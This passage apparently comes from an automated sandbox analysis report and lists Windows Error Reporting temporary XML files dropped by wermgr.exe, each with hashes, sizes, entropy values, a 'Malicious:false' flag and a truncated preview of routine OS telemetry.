          SHA-512:EDAD08A8FF8D02DE12CA12C5A4EF962912B864495EEA670A3439F16E71B14BD85ED5D32375B6E069F73C7654C7E30BB7EBACE533DF90B892E5CACA8A572399CB
          Malicious:false
          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.2.5.6.<./.P.i.

          C:\ProgramData\Microsoft\Windows\WER\Temp\WER4B63.tmp.xml

          Download File
          Process:C:\Windows\System32\wermgr.exe
          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
          Category:dropped
          Size (bytes):4899
          Entropy (8bit):4.565324149156893
          Encrypted:false
          SSDEEP:48:cvIwWl8zsVeJg771I9JWWpW8VYZPYm8M4JFKlnOtSFuyq8vT0OtCytfHd:uIjfVUI7237VoSJFKlnkWT0jufHd
          MD5:5CC0D06FF8A91DF4EBF801B72267C667
          SHA1:C3CA1EA937EE17ACBE01BDE601733C4B4DB9C502
          SHA-256:0ADE405627D72953D98414962B1CE8C055FBD5062317FDC202FED67A75A52EC1
          SHA-512:C5FCFB43E6F9CC11BE7B20AC277FBDF8C40FBD7878CA9C950FDD806F57D4634CCBF19A42BC4FA6DC84A4F8369B7BADE50D1041F8D34378477F87E099F6D725C0
          Malicious:false
          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="477101" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

          C:\ProgramData\Microsoft\Windows\WER\Temp\WER4F6F.tmp.WERInternalMetadata.xml

          Download File
          Process:C:\Windows\System32\wermgr.exe
          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
          Category:dropped
          Size (bytes):7418
          Entropy (8bit):3.6826297931645224
          Encrypted:false
          SSDEEP:96:RSIU6o7wVetbxNIJ4A6YBJWd8IgmfHNV9re17K5aM83m:R6l7wVeJxN+36YBJGgmftq8p83m
          MD5:57A2F74DF055473AD580B0942183DBC1
          SHA1:69956A206D4040F571D1BDC0B5596486D0751A70
          SHA-256:D017E91947AD8AAF141B84E5DA524C539D0B66F24CA6177ADFB60C141D74C4FB
          SHA-512:AFB752A378F3491AC6D4FDBF4330ED4297A3EB283C9C91832D646CEBEF8C76674C7D58C16E9D9F4297ABE848E5903D659D9DB8EC88C35B6A665283D84FF9FD85
          Malicious:false
          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.7.8.0.<./.P.i.

          C:\ProgramData\Microsoft\Windows\WER\Temp\WER504B.tmp.xml

          Download File
          Process:C:\Windows\System32\wermgr.exe
          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
          Category:dropped
          Size (bytes):4899
          Entropy (8bit):4.566572546194456
          Encrypted:false
          SSDEEP:48:cvIwWl8zsVkJg771I9JWWpW8VYiYm8M4JFKlnOtSFavWByq8vT0Ot/ytf5d:uIjfViI7237V6JFKlnnWT06uf5d
          MD5:F57F0BD9D7CE27A20DDBAAD02D8473BB
          SHA1:70AE15B7804A80A52375B23ADF9A53D3844E7BC6
          SHA-256:1A73F65A74D3FF6F2EDDCA8A48BA92118ED8C68CA94D0696A4F944FF5965B8C8
          SHA-512:4CD436B1E31F84D88F05D85272FDF606243BE23AAAF722B6203E1E66F343A55FE7A8AD3F10AA713FB17B2833C82C7678D2DA03BBFB2BD9888BC1C58968BB1FFE
          Malicious:false
          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="477103" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

          C:\ProgramData\Microsoft\Windows\WER\Temp\WER7B46.tmp.WERInternalMetadata.xml

          Download File
          Process:C:\Windows\System32\wermgr.exe
          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
          Category:dropped
          Size (bytes):7418
          Entropy (8bit):3.682501829481709
          Encrypted:false
          SSDEEP:96:RSIU6o7wVetbTKqrH6YBlgBAogmfHNV9re17K5aMVbaKm:R6l7wVeJTKqL6YBl8Aogmftq8pJaKm
          MD5:B08EFD2EE3F0CC25348A322B31DC6A21
          SHA1:E067EF2E683E96328164B2ABFDD89A54BD895896
          SHA-256:1A1A346B4FDB787E469E78891F18C46B6A3A08821B63E31E2CF64B93B1EB9373
          SHA-512:228FBFE264F11B18C6B765CB37B2A563F93C8F711610DA0A619FD665F4D9AF351B54BD8BC4F501DAA55B05F6004BEE1CE63EBECC9637DCB3EE93B741C7B67D3D
          Malicious:false
          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.5.9.6.<./.P.i.

          C:\ProgramData\Microsoft\Windows\WER\Temp\WER7B67.tmp.xml

          Download File
          Process:C:\Windows\System32\wermgr.exe
          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
          Category:dropped
          Size (bytes):4899
          Entropy (8bit):4.564529315776916
          Encrypted:false
          SSDEEP:48:cvIwWl8zsVlNJg771I9JWWpW8VYAYm8M4JFKlnOtSFbjyq8vT0OtMytf4d:uIjfVlnI7237VoJFKlnNWT09uf4d
          MD5:AB3DB8B4DB7AD8B7D500E445A2F11D44
          SHA1:113118E0548C6953E37610CEB6AA8CBF3680407F
          SHA-256:86549811B1126803259BC88400C58AEF2FE5E7242F1245FFF3951EA2603542B1
          SHA-512:5F641F7A30894A9B9F19CCF28E095292E8C3A48EA57695DC1972EB4E1F428FFE739B54BC409F98D2CA75F273384CD19EE35E657515415B8C016C819942928526
          Malicious:false
          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="477102" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

          C:\ProgramData\Microsoft\Windows\WER\Temp\WER7D15.tmp.WERInternalMetadata.xml

          Download File
          Process:C:\Windows\System32\wermgr.exe
          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
          Category:dropped
          Size (bytes):7416
          Entropy (8bit):3.6825135653430854
          Encrypted:false
          SSDEEP:96:RSIU6o7wVetbB1uEJ6YBhpSogmfHNV9re17K5aMAUoMm:R6l7wVeJB1ui6YBh4ogmftq8pZoMm
          MD5:DBF5A3FE0379126C771C5696A5A24687
          SHA1:1E0BEB7B4F9D250F39491B73DE410607F1062B62
          SHA-256:A9A633AB902CAACC9FA4EAAF44B4A7CBC95646C6E1045D034B4B02A6A9763159
          SHA-512:95D705E3726C16EFF9DE9016B04787F4841329E2F966247717752AEF0284E55606BCC2874BCB866CD3813369D4320259DF57A14CC183835242A02599C80A8624
          Malicious:false
          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.0.5.6.<./.P.i.

          C:\ProgramData\Microsoft\Windows\WER\Temp\WER7D35.tmp.xml

          Download File
          Process:C:\Windows\System32\wermgr.exe
          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
          Category:dropped
          Size (bytes):4899
          Entropy (8bit):4.568566359016914
          Encrypted:false
          SSDEEP:48:cvIwWl8zsV1Jg771I9JWWpW8VYfYm8M4JFKlnOtSF1yq8vT0Otnytfad:uIjfVPI7237V7JFKlnHWT0Kufad
          MD5:81C697C77ACADCCA652C1F5E5E548802
          SHA1:15594F7257871673224108D758C906EE88D3ADE1
          SHA-256:1461B405E70EF119485056B44EEA0BD35C50E9AACB3F4322E63C4F8A14E29E3F
          SHA-512:D3E037835C68E1035F7B6F91B2B8B96C160779FBFBDB9C87771D1EA025067C909A2E42DBCEDC447B7A0C681B8A724185E8988FBFB6DEE544AA8344D7A4616D18
          Malicious:false
          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="477100" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

          C:\ProgramData\Microsoft\Windows\WER\Temp\WERB046.tmp.WERInternalMetadata.xml

          Download File
          Process:C:\Windows\System32\wermgr.exe
          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
          Category:dropped
          Size (bytes):7418
          Entropy (8bit):3.6833480199705106
          Encrypted:false
          SSDEEP:96:RSIU6o7wVetbAvTYB6YBpL6bZ1gmfHNV9re17K5aMQ9m:R6l7wVeJAvT26YBpL691gmftq8pQ9m
          MD5:21EF7EDF4A858D96B5E15EEBBF0992E4
          SHA1:0CFA71F76989F083BE35813A151530E409C2BCBA
          SHA-256:E20698BB0A43DE59391396834A72C41A49242960B3CE258D93A4AA8167446406
          SHA-512:700A6D98CD0D5D4459E759A78C67C4523662F296B337D8C81EF2199E69908FCF5628FA9031335F569309462CAA3E897D0264540ED54C8DFC022CA31DB1B8144C
          Malicious:false
          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.3.6.8.<./.P.i.

          C:\ProgramData\Microsoft\Windows\WER\Temp\WERB066.tmp.xml

          Download File
          Process:C:\Windows\System32\wermgr.exe
          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
          Category:dropped
          Size (bytes):4899
          Entropy (8bit):4.565812801102728
          Encrypted:false
          SSDEEP:48:cvIwWl8zsVeJg771I9JWWpW8VY1Ym8M4JFKlnOtSFv62yq8vT0OtYytfjd:uIjfVUI7237VJJFKlnnWT0Nufjd
          MD5:9AB42EE61DF0B21542941FCF592EBFCB
          SHA1:C372577C9D2BF505B9BBC484C5CCA82FBC2D8E1F
          SHA-256:8C13960E3C08333A5D643717D82A75443A464CBC021F845601D3DFE89CDF162E
          SHA-512:155B6D08EEBAC4D90A13047E11B1F7D925DFFA3121B18D69874A0B6870EAFD2FF5F79B6FCAB846BCB30E3284721011ED32CB2CA0E9AA5023DEA53F82772E010D
          Malicious:false
          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="477101" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

          C:\ProgramData\Microsoft\Windows\WER\Temp\WERBCE2.tmp.WERInternalMetadata.xml

          Download File
          Process:C:\Windows\System32\wermgr.exe
          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
          Category:dropped
          Size (bytes):7414
          Entropy (8bit):3.6813548774064895
          Encrypted:false
          SSDEEP:96:RSIU6o7wVetbp8n96YBDs4rgmfHNV9re17K5aM+ym:R6l7wVeJp8n96YBDDrgmftq8p+ym
          MD5:2E72FC91E7FD0D7B78932828094592BC
          SHA1:82D7FE6BC6E5AFFA54BF71F3FFE38ADD4D96367A
          SHA-256:64721555398D4C90D7F23491D2C492A90799B77D27B619316D8663AAF12A20E8
          SHA-512:3402227C4C50F99488A2E3FEE93D0F2E18CD0F4EFC51452740D71EA988CAD324640E7F60E1B09ACFEA7090052CFAC90BE7854DD3492028B10D7AC8F72BAC1DD9
          Malicious:false
          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.9.6.0.<./.P.i.

          C:\ProgramData\Microsoft\Windows\WER\Temp\WERBD12.tmp.xml

          Download File
          Process:C:\Windows\System32\wermgr.exe
          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
          Category:dropped
          Size (bytes):4899
          Entropy (8bit):4.566335408717395
          Encrypted:false
          SSDEEP:48:cvIwWl8zsmtJg771I9JWWpW8VYmYm8M4JFKlnOtSF3dyq8vT0Ot6ytfqd:uIjfmHI7237VCJFKln3WT0Hufqd
          MD5:2692EE7DD3F75F46822D71270E2E8FBD
          SHA1:4681B1442DDB89FCA65F1BB11AB17D9F456D05BF
          SHA-256:10F31A350A795838302DF0DF21134C24735BD33277190F3148EDFCA19B255EE1
          SHA-512:79DE8C5856239B85E1015E5C2E95B1DBE71F3904CAFE587A1912FDC1DFA6023F75FB6C554F89C72357BB51A45D5A5B7696AA04AB2E3DDF2DC3AFC92F955A2A50
          Malicious:false
          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="477099" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

          C:\ProgramData\Microsoft\Windows\WER\Temp\WERE0D6.tmp.WERInternalMetadata.xml

          Download File
          Process:C:\Windows\System32\wermgr.exe
          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
          Category:dropped
          Size (bytes):7418
          Entropy (8bit):3.6830150872680654
          Encrypted:false
          SSDEEP:96:RSIU6o7wVetbjAtxaNFS6YB9qdyYgmfHNV9re17K5aMRDkGm:R6l7wVeJjAtInS6YB9qkYgmftq8pRD7m
          MD5:A5C6E1ADCF379A1A4B87472DCDB40AC8
          SHA1:FE025DB595354759F1610CF71BBF24D46E38C784
          SHA-256:26D119D3B5639CB69843A951F66F67D50404579ED4F103AE29816597BA90E23A
          SHA-512:2B199EACB7D5C420F0939C9F831B17525A1B4D7384C832E2A80BBB6DBB89699C0CF3A657736EBB8226C24689A61B5333BD745709A09B0BA7EA87D82FC9D04708
          Malicious:false
          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.3.9.2.<./.P.i.

          C:\ProgramData\Microsoft\Windows\WER\Temp\WERE0F7.tmp.xml

          Download File
          Process:C:\Windows\System32\wermgr.exe
          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
          Category:dropped
          Size (bytes):4899
          Entropy (8bit):4.567960821485126
          Encrypted:false
          SSDEEP:48:cvIwWl8zsVkJg771I9JWWpW8VYZYm8M4JFKlnOtSFtmyq8vT0OtDytfsd:uIjfViI7237V1JFKlnWWT0Sufsd
          MD5:6175FB6AE96E5C64480AF14E815DEDE7
          SHA1:69201457673940F1CE0B3FCC5242AF5020CA23E3
          SHA-256:4195D248CD911836A1F190C8A68B8CEE795424221F496626903FF628A38146FF
          SHA-512:3CB8077B88C98F5182995FE44632529973468B5D56FBA9E6A906103DE74344FB4E66DABC18F3E40714168482A2A1B58919A899F552260FC9717358248B8C10E4
          Malicious:false
